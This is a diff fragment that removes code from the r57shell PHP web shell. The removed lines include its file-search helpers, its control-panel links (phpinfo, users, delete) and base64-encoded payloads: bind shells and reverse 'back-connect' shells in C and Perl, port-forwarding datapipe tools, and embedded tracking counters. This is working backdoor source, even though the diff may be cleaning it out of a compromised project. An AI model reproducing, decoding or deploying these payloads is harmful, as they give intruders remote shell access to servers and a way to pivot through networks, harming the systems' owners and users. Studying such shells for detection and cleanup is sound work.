
-          $pos = @strrpos($file,".");

-          $ext = @substr($file,$pos,@strlen($file)-$pos);

-          if(@in_array($ext,array('.htm','.html')))

-          {

-            $header = '-=None=-';

-            $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file);

-            for($a=0;$a<count($strings);$a++)

-            {

-              $pattern = '(<title>(.+)</title>)';

-              if(@eregi($pattern,$strings[$a],$pockets))

-              {

-                $header = "&laquo;".$pockets[2]."&raquo;";

-                break;

-              }

-            }

-            echo "      <li>".$header."</li>\n";

-          }

-        }

-      }

-    }

-    echo "    </ul>\n";

-    @closedir($handle);

-  }

-

-  class SearchResult

-  {

-    var $text;

-    var $FilesToSearch;

-    var $ResultFiles;

-    var $FilesTotal;

-    var $MatchesCount;

-    var $FileMatschesCount;

-    var $TimeStart;

-    var $TimeTotal;

-    var $titles;

-    function SearchResult($dir,$text,$filter='')

-    {

-      $dirs = @explode(";",$dir);

-      $this->FilesToSearch = Array();

-      for($a=0;$a<count($dirs);$a++)

-        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));

-      $this->text = $text;

-      $this->FilesTotal = @count($this->FilesToSearch);

-      $this->TimeStart = getmicrotime();

-      $this->MatchesCount = 0;

-      $this->ResultFiles = Array();

-      $this->FileMatchesCount = Array();

-      $this->titles = Array();

-    }

-    function GetFilesTotal() { return $this->FilesTotal; }

-    function GetTitles() { return $this->titles; }

-    function GetTimeTotal() { return $this->TimeTotal; }

-    function GetMatchesCount() { return $this->MatchesCount; }

-    function GetFileMatchesCount() { return $this->FileMatchesCount; }

-    function GetResultFiles() { return $this->ResultFiles; }

-    function SearchText($phrase=0,$case=0) {

-    $qq = @explode(' ',$this->text);

-    $delim = '|';

-      if($phrase)

-        foreach($qq as $k=>$v)

-          $qq[$k] = '\b'.$v.'\b';

-      $words = '('.@implode($delim,$qq).')';

-      $pattern = "/".$words."/";

-      if(!$case)

-        $pattern .= 'i';

-      foreach($this->FilesToSearch as $k=>$filename)

-      {

-        $this->FileMatchesCount[$filename] = 0;

-        $FileStrings = @file($filename) or @next;

-        for($a=0;$a<@count($FileStrings);$a++)

-        {

-          $count = 0;

-          $CurString = $FileStrings[$a];

-          $CurString = @Trim($CurString);

-          $CurString = @strip_tags($CurString);

-          $aa = '';

-          if(($count = @preg_match_all($pattern,$CurString,$aa)))

-          {

-            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);

-            $this->ResultFiles[$filename][$a+1] = $CurString;

-            $this->MatchesCount += $count;

-            $this->FileMatchesCount[$filename] += $count;

-          }

-        }

-      }

-      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);

-    }

-  }

-  function getmicrotime()

-  {

-    list($usec,$sec) = @explode(" ",@microtime());

-    return ((float)$usec + (float)$sec);

-  }

-$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS

-A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I

-GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt

-b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9

-pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF

-NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK

-ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog

-ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk

-7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2

-9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld

-2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu

-dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp

-lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";

-$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS

-VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs

-JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV

-TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG

-lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK

-Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i

-Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N

-lIENPTk47DQpleGl0IDA7DQp9DQp9";

-$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj

-aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR

-hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT

-sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI

-kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi

-KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl

-OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

-$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC

-BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb

-SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd

-KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ

-sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC

-Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D

-QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp

-Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";

-$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2

-x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb

-HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj

-aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ

-lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm

-xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga

-W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy

-LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV

-udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow

-0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb

-iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l

-KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA

-gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS

-hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC

-iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh

-ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ

-vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC

-AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D

-QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh

-ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0

-gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay

-wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c

-29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy

-MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA

-gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci

-5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ

-HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu

-dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0

-KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC

-ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI

-E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp

-Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs

-NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG

-J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL

-CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp

-dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo

-gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm

-lsZSk7DQogIHJldHVybiAwOw0KfQ==";

-$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I

-CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl

-bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU

-gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol

-NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC

-iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy

-aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ

-SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2

-xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ

-WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN

-CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9

-yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi

-I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc

-m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp

-IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ

-lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW

-QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK

-CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g

-c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0

-NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG

-UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I

-DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs

-ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J

-1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";

-$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2

-JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l

-lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW

-FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L

-3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr

-J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR

-oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj

-xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO

-i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv

-dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB

-ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2

-hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg==";

-$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh

-IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl

-hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz

-tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa

-XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u

-8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV

-ybmV0LS0+";

-echo $head;

-echo '</head>';

-if(empty($_POST['cmd'])) {

-$serv = array(127,192,172,10);

-$addr=@explode('.', $_SERVER['SERVER_ADDR']);

-$current_version = str_replace('.','',$version);

-if (!in_array($addr[0], $serv)) {

-@print "<img src=\"http://127.0.0.1/r57shell/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>";

-@readfile ("http://127.0.0.1/r57shell/version.php?version=".$current_version."");}}  

-echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000>

-<tr><td bgcolor=#cccccc width=160><font face=Verdana size=2>'.ws(1).'&nbsp;

-<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b>

-</font></td><td bgcolor=#cccccc><font face=Verdana size=-2>';

-echo ws(2);

-echo "<b>".date ("d-m-Y H:i:s")."</b>";

-echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;

-echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;

-echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;

-echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;

-if($unix) { echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?users title=\"".$lang[$language.'_text95']."\"><b>users</b></a> ".$rb; }

-echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb;

-echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>";

